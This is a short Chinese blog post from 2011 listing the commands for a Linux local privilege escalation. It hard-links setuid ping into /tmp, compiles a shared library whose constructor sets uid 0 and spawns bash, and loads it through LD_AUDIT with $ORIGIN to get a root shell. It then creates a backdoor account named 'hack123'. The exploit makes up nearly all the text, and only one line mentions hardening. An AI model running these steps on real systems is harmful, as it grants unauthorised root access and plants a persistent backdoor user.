很久的linux提权的一些过程

Updated on 2011 年 10 月 04 日 By SK 评论关闭

阵列笔记mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target

ls -l /proc/$$/fd/3
rm -rf /tmp/exploit/
ls -l /proc/$$/fd/3
vi s.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}

gcc -w -fPIC -shared -o /tmp/exploit s.c

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 && adduser hack123 -p hack123


可以根据执行的命令，进行一系列的安全加固，比如ping的S权限等

By SK

服务器维护服务器配置服务器维护运维网管系统调优网络调优数据库优化

http://www.sklinux.com

Scroll To Top